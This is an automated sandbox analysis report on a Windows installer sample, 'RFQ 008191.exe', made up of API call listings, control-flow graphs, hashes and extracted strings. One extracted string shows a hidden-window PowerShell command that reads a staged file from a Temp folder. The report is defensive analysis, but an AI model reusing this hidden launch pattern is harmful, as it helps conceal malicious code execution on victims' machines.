                                                                    • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                                                    • API String ID: 4024019347-3412683584
                                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                                                    Function 00401794 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 509 401794-4017b9 call 402dcb call 405e87 514 4017c3-4017d5 call 406541 call 405e10 lstrcatW 509->514 515 4017bb-4017c1 call 406541 509->515 520 4017da-4017db call 4067ef 514->520 515->520 524 4017e0-4017e4 520->524 525 4017e6-4017f0 call 40689e 524->525 526 401817-40181a 524->526 533 401802-401814 525->533 534 4017f2-401800 CompareFileTime 525->534 528 401822-40183e call 406031 526->528 529 40181c-40181d call 40600c 526->529 536 401840-401843 528->536 537 4018b2-4018db call 4055c6 call 4032d9 528->537 529->528 533->526 534->533 538 401894-40189e call 4055c6 536->538 539 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 536->539 549 4018e3-4018ef SetFileTime 537->549 550 4018dd-4018e1 537->550 551 4018a7-4018ad 538->551 539->524 571 401889-40188a 539->571 554 4018f5-401900 CloseHandle 549->554 550->549 550->554 555 402c58 551->555 557 401906-401909 554->557 558 402c4f-402c52 554->558 559 402c5a-402c5e 555->559 561 40190b-40191c call 40657e lstrcatW 557->561 562 40191e-401921 call 40657e 557->562 558->555 568 401926-4023c7 call 405ba1 561->568 562->568 568->559 575 402953-40295a 568->575 571->551 573 40188c-40188d 571->573 573->538 575->558
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean,?,?,00000031), ref: 004017D5
                                                                    • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean,?,?,00000031), ref: 004017FA
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                      • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                      • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: 32079$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean$hadefuldeste\optjeningers\hottish
                                                                    • API String ID: 1941528284-2145868179
                                                                    • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                    • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                    • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                                                    Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 582 405626-40562a 580->582 583 40560b-40561b lstrlenW 580->583 585 405639-40563d 582->585 586 40562c-405633 SetWindowTextW 582->586 583->578 584 40561d-405621 lstrcatW 583->584 584->582 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                    • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                    • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                    • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: daniglacial
                                                                    • API String ID: 2531174081-766043870
                                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                                                    Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 603 40333a-40335a GetTickCount call 406a90 600->603 604 40345e-403460 600->604 602 403477-403478 601->602 605 4034b7-4034bb 602->605 616 4034b4 603->616 618 403360-403368 603->618 606 403462-403465 604->606 607 4034a9-4034ad 604->607 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 623 4034b1 610->623 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 623->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->602 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->602 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 650 403412 641->650 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 649 40343e-403442 646->649 651 403429-40342b 647->651 649->630 652 403448 649->652 650->638 651->634 653 40342d-403430 651->653 652->616 653->649
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                    • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                    • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                    • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                                                    Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                    • wsprintfW.USER32 ref: 00406917
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME
                                                                    • API String ID: 2200240437-1106614640
                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                    • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                                                    Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040607E
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806), ref: 00406099
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-3083371207
                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                                    Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 772 402c4f-402c5e 758->772 759->772 779 401680-401683 759->779 763->764 768 401616-40161d call 405b0c 763->768 771 401631-401633 764->771 768->764 783 40161f-401627 call 405a95 768->783 775 401635-40163a 771->775 776 40164c-401654 771->776 780 401649 775->780 781 40163c-401647 GetFileAttributesW 775->781 776->755 776->756 779->772 780->776 781->776 781->780 783->771
                                                                    APIs
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405EC9
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                      • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                      • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean,?,00000000,000000F0), ref: 00401672
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean, xrefs: 00401665
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean
                                                                    • API String ID: 1892508949-2601639953
                                                                    • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                    • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                                    • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                    • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                                    Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 799 40742b-40743e 795->799 800 4073cd-4073ee 795->800 798 407313-40731a 796->798 797->798 803 407341 798->803 804 40731c-407320 798->804 805 407347-40734d 799->805 801 4073f0-407405 800->801 802 407407-40741a 800->802 806 40741d-407424 801->806 802->806 803->805 807 407326-40733e 804->807 808 4074cf-4074d9 804->808 810 406af2 805->810 811 4074fa 805->811 813 4073c4 806->813 814 407426 806->814 807->803 812 4074e5-4074f8 808->812 816 406af9-406afd 810->816 817 406c39-406c5a 810->817 818 406b9e-406ba2 810->818 819 406c0e-406c12 810->819 815 4074fd-407501 811->815 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->812 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->812 823->813 824->812 825->811 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->812 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->811 842 406b81 837->842 838->828 839->838 839->839 840->811 840->835 841->840 842->832
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
